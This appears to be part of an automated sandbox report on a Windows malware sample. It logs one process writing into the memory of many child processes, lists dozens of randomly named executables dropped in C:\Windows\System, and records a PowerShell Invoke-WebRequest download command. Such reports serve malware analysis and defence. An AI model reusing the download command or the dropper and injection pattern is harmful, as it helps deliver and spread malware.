PID 2084 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JuSnDLj.exe
PID 2084 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JuSnDLj.exe
PID 2084 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JuSnDLj.exe
PID 2084 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\YIipYkp.exe
PID 2084 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\YIipYkp.exe
PID 2084 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\YIipYkp.exe
PID 2084 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eCXrNnn.exe
PID 2084 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eCXrNnn.exe
PID 2084 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\eCXrNnn.exe
PID 2084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nwhzArH.exe
PID 2084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nwhzArH.exe
PID 2084 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\nwhzArH.exe
PID 2084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AuVxoGG.exe
PID 2084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AuVxoGG.exe
PID 2084 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AuVxoGG.exe
PID 2084 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\heysZsU.exe
PID 2084 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\heysZsU.exe
PID 2084 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\heysZsU.exe
PID 2084 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\OafXktD.exe
PID 2084 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\OafXktD.exe
PID 2084 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\OafXktD.exe
PID 2084 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\SRlwNSr.exe
PID 2084 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\SRlwNSr.exe
PID 2084 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\SRlwNSr.exe
PID 2084 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\GZEAeoJ.exe
PID 2084 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\GZEAeoJ.exe
PID 2084 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\GZEAeoJ.exe
PID 2084 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\VRgIbfp.exe
PID 2084 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\VRgIbfp.exe
PID 2084 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\VRgIbfp.exe
PID 2084 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oFqPQyK.exe
PID 2084 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oFqPQyK.exe
PID 2084 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\oFqPQyK.exe
PID 2084 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JbCstti.exe
PID 2084 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JbCstti.exe
PID 2084 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\JbCstti.exe
PID 2084 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\KJiXiIS.exe
PID 2084 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\KJiXiIS.exe
PID 2084 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\KJiXiIS.exe
PID 2084 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNbfdYp.exe
PID 2084 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNbfdYp.exe
PID 2084 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QNbfdYp.exe
PID 2084 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AhAIcat.exe
PID 2084 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AhAIcat.exe
PID 2084 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\AhAIcat.exe
PID 2084 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\UOAriZO.exe
PID 2084 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\UOAriZO.exe
PID 2084 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\UOAriZO.exe
PID 2084 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\pubthri.exe
PID 2084 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\pubthri.exe
PID 2084 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\pubthri.exe
PID 2084 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QCKnUPl.exe
PID 2084 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QCKnUPl.exe
PID 2084 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\QCKnUPl.exe
PID 2084 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe C:\Windows\System\XCBqqjh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\292aeee5d0cd1ac298ce707297df0ad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\DZrKkAd.exe

C:\Windows\System\DZrKkAd.exe

C:\Windows\System\QNqTcCI.exe

C:\Windows\System\QNqTcCI.exe

C:\Windows\System\JuSnDLj.exe

C:\Windows\System\JuSnDLj.exe

C:\Windows\System\YIipYkp.exe

C:\Windows\System\YIipYkp.exe

C:\Windows\System\eCXrNnn.exe

C:\Windows\System\eCXrNnn.exe

C:\Windows\System\nwhzArH.exe

C:\Windows\System\nwhzArH.exe

C:\Windows\System\AuVxoGG.exe

C:\Windows\System\AuVxoGG.exe

C:\Windows\System\heysZsU.exe

C:\Windows\System\heysZsU.exe

C:\Windows\System\OafXktD.exe

C:\Windows\System\OafXktD.exe

C:\Windows\System\SRlwNSr.exe

C:\Windows\System\SRlwNSr.exe

C:\Windows\System\GZEAeoJ.exe

C:\Windows\System\GZEAeoJ.exe

C:\Windows\System\VRgIbfp.exe

C:\Windows\System\VRgIbfp.exe

C:\Windows\System\oFqPQyK.exe

C:\Windows\System\oFqPQyK.exe

C:\Windows\System\JbCstti.exe

C:\Windows\System\JbCstti.exe

C:\Windows\System\KJiXiIS.exe

C:\Windows\System\KJiXiIS.exe

C:\Windows\System\QNbfdYp.exe

C:\Windows\System\QNbfdYp.exe

C:\Windows\System\AhAIcat.exe

C:\Windows\System\AhAIcat.exe

C:\Windows\System\UOAriZO.exe

C:\Windows\System\UOAriZO.exe

C:\Windows\System\pubthri.exe

C:\Windows\System\pubthri.exe

C:\Windows\System\QCKnUPl.exe

C:\Windows\System\QCKnUPl.exe

C:\Windows\System\XCBqqjh.exe

C:\Windows\System\XCBqqjh.exe

C:\Windows\System\DyIbAXX.exe

C:\Windows\System\DyIbAXX.exe

C:\Windows\System\lbVdRxA.exe

C:\Windows\System\lbVdRxA.exe

C:\Windows\System\labQVpR.exe

C:\Windows\System\labQVpR.exe

C:\Windows\System\dqhsYFV.exe

C:\Windows\System\dqhsYFV.exe

C:\Windows\System\WxqJLut.exe

C:\Windows\System\WxqJLut.exe

C:\Windows\System\wKWjoZl.exe

C:\Windows\System\wKWjoZl.exe

C:\Windows\System\LlqgRTd.exe

C:\Windows\System\LlqgRTd.exe

C:\Windows\System\AlqyhVN.exe

C:\Windows\System\AlqyhVN.exe

C:\Windows\System\TQAkVdR.exe

C:\Windows\System\TQAkVdR.exe

C:\Windows\System\cvgkOgm.exe

C:\Windows\System\cvgkOgm.exe

C:\Windows\System\eWpZtqO.exe

C:\Windows\System\eWpZtqO.exe

C:\Windows\System\zoCoJvL.exe

C:\Windows\System\zoCoJvL.exe

C:\Windows\System\lXkmKnX.exe

C:\Windows\System\lXkmKnX.exe

C:\Windows\System\SptAkAs.exe

C:\Windows\System\SptAkAs.exe

C:\Windows\System\iiOSRlt.exe

C:\Windows\System\iiOSRlt.exe

C:\Windows\System\lZpXcky.exe

C:\Windows\System\lZpXcky.exe

C:\Windows\System\lCsIxlX.exe

C:\Windows\System\lCsIxlX.exe

C:\Windows\System\HmScMmD.exe

C:\Windows\System\HmScMmD.exe

C:\Windows\System\zmLvtDW.exe

C:\Windows\System\zmLvtDW.exe

C:\Windows\System\tngCnho.exe

C:\Windows\System\tngCnho.exe

C:\Windows\System\NgPcNDV.exe

C:\Windows\System\NgPcNDV.exe

C:\Windows\System\wXHUnoW.exe

C:\Windows\System\wXHUnoW.exe

C:\Windows\System\sYDpZYp.exe

C:\Windows\System\sYDpZYp.exe

C:\Windows\System\DBAKqno.exe

C:\Windows\System\DBAKqno.exe

C:\Windows\System\phHFcgd.exe

C:\Windows\System\phHFcgd.exe

C:\Windows\System\NhTFnRY.exe

C:\Windows\System\NhTFnRY.exe

C:\Windows\System\ZhBqOsc.exe

C:\Windows\System\ZhBqOsc.exe

C:\Windows\System\ndLtcjy.exe

C:\Windows\System\ndLtcjy.exe

C:\Windows\System\EWPHhww.exe

C:\Windows\System\EWPHhww.exe

C:\Windows\System\yPGcQnP.exe

C:\Windows\System\yPGcQnP.exe

C:\Windows\System\JlzsNLl.exe

C:\Windows\System\JlzsNLl.exe

C:\Windows\System\FIaFhGC.exe

C:\Windows\System\FIaFhGC.exe

C:\Windows\System\fqcXtqm.exe

C:\Windows\System\fqcXtqm.exe

C:\Windows\System\rjCRxQp.exe

C:\Windows\System\rjCRxQp.exe

C:\Windows\System\PXztiuN.exe

C:\Windows\System\PXztiuN.exe

C:\Windows\System\dFBnJHh.exe

C:\Windows\System\dFBnJHh.exe

C:\Windows\System\IZWjGJt.exe

C:\Windows\System\IZWjGJt.exe

C:\Windows\System\AOzYknH.exe

C:\Windows\System\AOzYknH.exe

C:\Windows\System\PxrxJuj.exe

C:\Windows\System\PxrxJuj.exe

C:\Windows\System\TSTCMLu.exe

C:\Windows\System\TSTCMLu.exe

C:\Windows\System\lGFCcQY.exe

C:\Windows\System\lGFCcQY.exe

C:\Windows\System\GQVRKro.exe

C:\Windows\System\GQVRKro.exe

C:\Windows\System\OyWCeiz.exe

C:\Windows\System\OyWCeiz.exe

C:\Windows\System\mLHQZXB.exe

C:\Windows\System\mLHQZXB.exe

C:\Windows\System\GSDsjYp.exe

C:\Windows\System\GSDsjYp.exe

C:\Windows\System\izwVzpr.exe

C:\Windows\System\izwVzpr.exe

C:\Windows\System\miPzVyl.exe

C:\Windows\System\miPzVyl.exe

C:\Windows\System\bjndRDo.exe

C:\Windows\System\bjndRDo.exe

C:\Windows\System\NoNcSzH.exe

C:\Windows\System\NoNcSzH.exe

C:\Windows\System\HRcgLwv.exe

C:\Windows\System\HRcgLwv.exe

C:\Windows\System\YvWsWxc.exe

C:\Windows\System\YvWsWxc.exe

C:\Windows\System\iUEibNn.exe

C:\Windows\System\iUEibNn.exe

C:\Windows\System\qbHAwtE.exe

C:\Windows\System\qbHAwtE.exe

C:\Windows\System\QoySicQ.exe

C:\Windows\System\QoySicQ.exe

C:\Windows\System\rmakWIg.exe

C:\Windows\System\rmakWIg.exe

C:\Windows\System\vYJIOUd.exe

C:\Windows\System\vYJIOUd.exe

C:\Windows\System\rLSVcBl.exe

C:\Windows\System\rLSVcBl.exe

C:\Windows\System\wLAYOkZ.exe

C:\Windows\System\wLAYOkZ.exe

C:\Windows\System\nrRJueK.exe

C:\Windows\System\nrRJueK.exe

C:\Windows\System\BDiWeOS.exe

C:\Windows\System\BDiWeOS.exe

C:\Windows\System\fQroBFD.exe

C:\Windows\System\fQroBFD.exe

C:\Windows\System\tuEUvYM.exe

C:\Windows\System\tuEUvYM.exe

C:\Windows\System\iOjvsls.exe

C:\Windows\System\iOjvsls.exe

C:\Windows\System\NftvkjI.exe

C:\Windows\System\NftvkjI.exe

C:\Windows\System\DefjfYL.exe

C:\Windows\System\DefjfYL.exe

C:\Windows\System\AwDsOMj.exe

C:\Windows\System\AwDsOMj.exe

C:\Windows\System\QFIchPp.exe

C:\Windows\System\QFIchPp.exe

C:\Windows\System\ZiashHE.exe

C:\Windows\System\ZiashHE.exe

C:\Windows\System\YVyKLbz.exe

C:\Windows\System\YVyKLbz.exe

C:\Windows\System\dLOiQEU.exe

C:\Windows\System\dLOiQEU.exe

C:\Windows\System\EbPxmfu.exe

C:\Windows\System\EbPxmfu.exe

C:\Windows\System\gxSXLcs.exe

C:\Windows\System\gxSXLcs.exe

C:\Windows\System\ItwtCDK.exe

C:\Windows\System\ItwtCDK.exe

C:\Windows\System\StIxGpT.exe

C:\Windows\System\StIxGpT.exe

C:\Windows\System\FYiyFtm.exe

C:\Windows\System\FYiyFtm.exe

C:\Windows\System\GVmAqun.exe

C:\Windows\System\GVmAqun.exe

C:\Windows\System\nkGajVu.exe

C:\Windows\System\nkGajVu.exe

C:\Windows\System\eWbAFmR.exe

C:\Windows\System\eWbAFmR.exe

C:\Windows\System\aHOuioB.exe

C:\Windows\System\aHOuioB.exe

C:\Windows\System\VAwNTqz.exe

C:\Windows\System\VAwNTqz.exe

C:\Windows\System\ShMeXdP.exe

C:\Windows\System\ShMeXdP.exe

C:\Windows\System\IKWGSdu.exe

C:\Windows\System\IKWGSdu.exe

C:\Windows\System\ufbxWBA.exe

C:\Windows\System\ufbxWBA.exe

C:\Windows\System\uSDpwvL.exe

C:\Windows\System\uSDpwvL.exe

C:\Windows\System\zYosrZS.exe

C:\Windows\System\zYosrZS.exe

C:\Windows\System\ghnaykM.exe

C:\Windows\System\ghnaykM.exe

C:\Windows\System\fWKdSrO.exe

C:\Windows\System\fWKdSrO.exe

C:\Windows\System\eEzxYhN.exe

C:\Windows\System\eEzxYhN.exe

C:\Windows\System\IhVkRSm.exe

C:\Windows\System\IhVkRSm.exe

C:\Windows\System\jjUYeZQ.exe

C:\Windows\System\jjUYeZQ.exe

C:\Windows\System\WphJudc.exe

C:\Windows\System\WphJudc.exe

C:\Windows\System\budMqjw.exe

C:\Windows\System\budMqjw.exe

C:\Windows\System\fYOnmcj.exe

C:\Windows\System\fYOnmcj.exe

C:\Windows\System\SzwizRt.exe

C:\Windows\System\SzwizRt.exe

C:\Windows\System\CdMKtVk.exe

C:\Windows\System\CdMKtVk.exe

C:\Windows\System\xHyKyxh.exe

C:\Windows\System\xHyKyxh.exe

C:\Windows\System\fRCwrrT.exe

C:\Windows\System\fRCwrrT.exe

C:\Windows\System\EVSoMZS.exe

C:\Windows\System\EVSoMZS.exe

C:\Windows\System\uOYXblH.exe

C:\Windows\System\uOYXblH.exe

C:\Windows\System\WukKtby.exe

C:\Windows\System\WukKtby.exe

C:\Windows\System\wPpoRpO.exe

C:\Windows\System\wPpoRpO.exe

C:\Windows\System\KSWMTpm.exe

C:\Windows\System\KSWMTpm.exe

C:\Windows\System\RcuhUof.exe

C:\Windows\System\RcuhUof.exe

C:\Windows\System\bCgBOLK.exe

C:\Windows\System\bCgBOLK.exe

C:\Windows\System\YjjuvMT.exe

C:\Windows\System\YjjuvMT.exe

C:\Windows\System\nyFsncm.exe

C:\Windows\System\nyFsncm.exe

C:\Windows\System\rGewJnD.exe

C:\Windows\System\rGewJnD.exe

C:\Windows\System\bWylXRq.exe

C:\Windows\System\bWylXRq.exe

C:\Windows\System\YuGaRDi.exe

C:\Windows\System\YuGaRDi.exe

C:\Windows\System\KkSjuwx.exe

C:\Windows\System\KkSjuwx.exe

C:\Windows\System\lybcGBh.exe

C:\Windows\System\lybcGBh.exe

C:\Windows\System\RsMDWtD.exe

C:\Windows\System\RsMDWtD.exe

C:\Windows\System\VlpfwDX.exe

C:\Windows\System\VlpfwDX.exe

C:\Windows\System\ReVSfAt.exe

C:\Windows\System\ReVSfAt.exe

C:\Windows\System\rECAssU.exe

C:\Windows\System\rECAssU.exe

C:\Windows\System\kEsPrJs.exe

C:\Windows\System\kEsPrJs.exe

C:\Windows\System\iZSlKaA.exe

C:\Windows\System\iZSlKaA.exe

C:\Windows\System\HEUojKO.exe

C:\Windows\System\HEUojKO.exe

C:\Windows\System\nkrDEVg.exe

C:\Windows\System\nkrDEVg.exe

C:\Windows\System\VXqRBXP.exe

C:\Windows\System\VXqRBXP.exe

C:\Windows\System\PoyfjtF.exe

C:\Windows\System\PoyfjtF.exe

C:\Windows\System\dvkFpMt.exe

C:\Windows\System\dvkFpMt.exe

C:\Windows\System\BBzYquH.exe

C:\Windows\System\BBzYquH.exe

C:\Windows\System\lTkfItc.exe

C:\Windows\System\lTkfItc.exe

C:\Windows\System\RhPCjWg.exe

C:\Windows\System\RhPCjWg.exe

C:\Windows\System\ISuEPTA.exe

C:\Windows\System\ISuEPTA.exe

C:\Windows\System\mMcdoav.exe

C:\Windows\System\mMcdoav.exe

C:\Windows\System\bgnpslX.exe

C:\Windows\System\bgnpslX.exe

C:\Windows\System\ygtWuUR.exe

C:\Windows\System\ygtWuUR.exe

C:\Windows\System\OisLfTL.exe

C:\Windows\System\OisLfTL.exe

C:\Windows\System\AKlNPkA.exe

C:\Windows\System\AKlNPkA.exe

C:\Windows\System\zIuaLFf.exe

C:\Windows\System\zIuaLFf.exe

C:\Windows\System\KMHEVzU.exe

C:\Windows\System\KMHEVzU.exe

C:\Windows\System\tJbhKMf.exe

C:\Windows\System\tJbhKMf.exe

C:\Windows\System\ESIFbqp.exe

C:\Windows\System\ESIFbqp.exe

C:\Windows\System\YtYduxi.exe

C:\Windows\System\YtYduxi.exe

C:\Windows\System\QwHFTVk.exe

C:\Windows\System\QwHFTVk.exe

C:\Windows\System\NGctbud.exe

C:\Windows\System\NGctbud.exe

C:\Windows\System\HiFIKZh.exe

C:\Windows\System\HiFIKZh.exe

C:\Windows\System\WrAqIdp.exe

C:\Windows\System\WrAqIdp.exe

C:\Windows\System\tAyWmeZ.exe

C:\Windows\System\tAyWmeZ.exe

C:\Windows\System\PyaYJSJ.exe

C:\Windows\System\PyaYJSJ.exe

C:\Windows\System\lxeMnWu.exe

C:\Windows\System\lxeMnWu.exe

C:\Windows\System\pPMvPby.exe

C:\Windows\System\pPMvPby.exe

C:\Windows\System\lBjTNQn.exe

C:\Windows\System\lBjTNQn.exe

C:\Windows\System\rMBHzzj.exe

C:\Windows\System\rMBHzzj.exe

C:\Windows\System\JgskadQ.exe

C:\Windows\System\JgskadQ.exe

C:\Windows\System\NHNuyAT.exe

C:\Windows\System\NHNuyAT.exe

C:\Windows\System\FXRRIBK.exe

C:\Windows\System\FXRRIBK.exe

C:\Windows\System\xCJZeVB.exe

C:\Windows\System\xCJZeVB.exe

C:\Windows\System\PtQfumx.exe

C:\Windows\System\PtQfumx.exe

C:\Windows\System\Negxlyk.exe

C:\Windows\System\Negxlyk.exe

C:\Windows\System\JvSKGoU.exe

C:\Windows\System\JvSKGoU.exe

C:\Windows\System\bJgOeBZ.exe

C:\Windows\System\bJgOeBZ.exe

C:\Windows\System\SdKMRco.exe

C:\Windows\System\SdKMRco.exe

C:\Windows\System\GsDGlub.exe

C:\Windows\System\GsDGlub.exe

C:\Windows\System\aBGDYqt.exe

C:\Windows\System\aBGDYqt.exe

C:\Windows\System\dCiYEQz.exe

C:\Windows\System\dCiYEQz.exe

C:\Windows\System\tShJlah.exe

C:\Windows\System\tShJlah.exe

C:\Windows\System\RuqHGOs.exe

C:\Windows\System\RuqHGOs.exe

C:\Windows\System\hNIJarx.exe

C:\Windows\System\hNIJarx.exe

C:\Windows\System\aQNOLRF.exe

C:\Windows\System\aQNOLRF.exe

C:\Windows\System\WXfumGf.exe

C:\Windows\System\WXfumGf.exe

C:\Windows\System\kQNcwGk.exe

C:\Windows\System\kQNcwGk.exe

C:\Windows\System\EgFimgX.exe

C:\Windows\System\EgFimgX.exe

C:\Windows\System\xJhHsdI.exe

C:\Windows\System\xJhHsdI.exe

C:\Windows\System\xtgYjYY.exe

C:\Windows\System\xtgYjYY.exe

C:\Windows\System\ORqOOZq.exe

C:\Windows\System\ORqOOZq.exe

C:\Windows\System\JnohjkE.exe

C:\Windows\System\JnohjkE.exe

C:\Windows\System\VJwZzoA.exe

C:\Windows\System\VJwZzoA.exe

C:\Windows\System\fFnSSmG.exe

C:\Windows\System\fFnSSmG.exe

C:\Windows\System\OTklUIs.exe

C:\Windows\System\OTklUIs.exe

C:\Windows\System\yiKFmxW.exe

C:\Windows\System\yiKFmxW.exe

C:\Windows\System\PcKJmJr.exe

C:\Windows\System\PcKJmJr.exe

C:\Windows\System\afznUbn.exe

C:\Windows\System\afznUbn.exe

C:\Windows\System\fZDCKYW.exe

C:\Windows\System\fZDCKYW.exe

C:\Windows\System\fcbVmOE.exe

C:\Windows\System\fcbVmOE.exe

C:\Windows\System\VNKqaJs.exe

C:\Windows\System\VNKqaJs.exe

C:\Windows\System\CxINEUK.exe

C:\Windows\System\CxINEUK.exe

C:\Windows\System\BiwgWVP.exe

C:\Windows\System\BiwgWVP.exe

C:\Windows\System\equqRZE.exe

C:\Windows\System\equqRZE.exe

C:\Windows\System\ZXkXjCv.exe

C:\Windows\System\ZXkXjCv.exe

C:\Windows\System\dgjZTaS.exe

C:\Windows\System\dgjZTaS.exe

C:\Windows\System\IuHQbcc.exe

C:\Windows\System\IuHQbcc.exe

C:\Windows\System\hzoZPwp.exe

C:\Windows\System\hzoZPwp.exe

C:\Windows\System\IFoAxkT.exe

C:\Windows\System\IFoAxkT.exe

C:\Windows\System\QSCfrfu.exe

C:\Windows\System\QSCfrfu.exe

C:\Windows\System\zEFKDgI.exe

C:\Windows\System\zEFKDgI.exe

C:\Windows\System\EuUFSYv.exe

C:\Windows\System\EuUFSYv.exe

C:\Windows\System\UdtBdjs.exe

C:\Windows\System\UdtBdjs.exe

C:\Windows\System\oENSJzw.exe

C:\Windows\System\oENSJzw.exe

C:\Windows\System\NVKDHxY.exe

C:\Windows\System\NVKDHxY.exe

C:\Windows\System\DjHUFlP.exe

C:\Windows\System\DjHUFlP.exe

C:\Windows\System\BylgANZ.exe

C:\Windows\System\BylgANZ.exe

C:\Windows\System\YcYyLBu.exe

C:\Windows\System\YcYyLBu.exe

C:\Windows\System\mjdHJSw.exe

C:\Windows\System\mjdHJSw.exe

C:\Windows\System\wLuzFQk.exe

C:\Windows\System\wLuzFQk.exe

C:\Windows\System\eNBimbN.exe

C:\Windows\System\eNBimbN.exe

C:\Windows\System\RonnsUp.exe

C:\Windows\System\RonnsUp.exe

C:\Windows\System\TsyDbEO.exe

C:\Windows\System\TsyDbEO.exe

C:\Windows\System\CUKbhWX.exe

C:\Windows\System\CUKbhWX.exe

C:\Windows\System\uomYwDD.exe

C:\Windows\System\uomYwDD.exe

C:\Windows\System\mrJHOew.exe

C:\Windows\System\mrJHOew.exe

C:\Windows\System\AimDZiD.exe

C:\Windows\System\AimDZiD.exe

C:\Windows\System\fEmPXUW.exe

C:\Windows\System\fEmPXUW.exe

C:\Windows\System\YOzBmMs.exe

C:\Windows\System\YOzBmMs.exe

C:\Windows\System\lldpcAo.exe

C:\Windows\System\lldpcAo.exe

C:\Windows\System\lKBKGVM.exe

C:\Windows\System\lKBKGVM.exe

C:\Windows\System\untSzcZ.exe

C:\Windows\System\untSzcZ.exe

C:\Windows\System\oQzzAVR.exe

C:\Windows\System\oQzzAVR.exe

C:\Windows\System\UEmnXWA.exe

C:\Windows\System\UEmnXWA.exe

C:\Windows\System\SxaBcWE.exe

C:\Windows\System\SxaBcWE.exe

C:\Windows\System\QmkrvTV.exe

C:\Windows\System\QmkrvTV.exe

C:\Windows\System\pGrMBbe.exe

C:\Windows\System\pGrMBbe.exe

C:\Windows\System\qVKYjlN.exe

C:\Windows\System\qVKYjlN.exe

C:\Windows\System\TluBUYP.exe

C:\Windows\System\TluBUYP.exe

C:\Windows\System\kfCroqE.exe

C:\Windows\System\kfCroqE.exe

C:\Windows\System\tqAyBtT.exe

C:\Windows\System\tqAyBtT.exe

C:\Windows\System\jkcfFQn.exe

C:\Windows\System\jkcfFQn.exe

C:\Windows\System\rcYXfFP.exe

C:\Windows\System\rcYXfFP.exe

C:\Windows\System\ZJYUhdu.exe

C:\Windows\System\ZJYUhdu.exe

C:\Windows\System\dVCvbNh.exe

C:\Windows\System\dVCvbNh.exe

C:\Windows\System\WMAUuma.exe

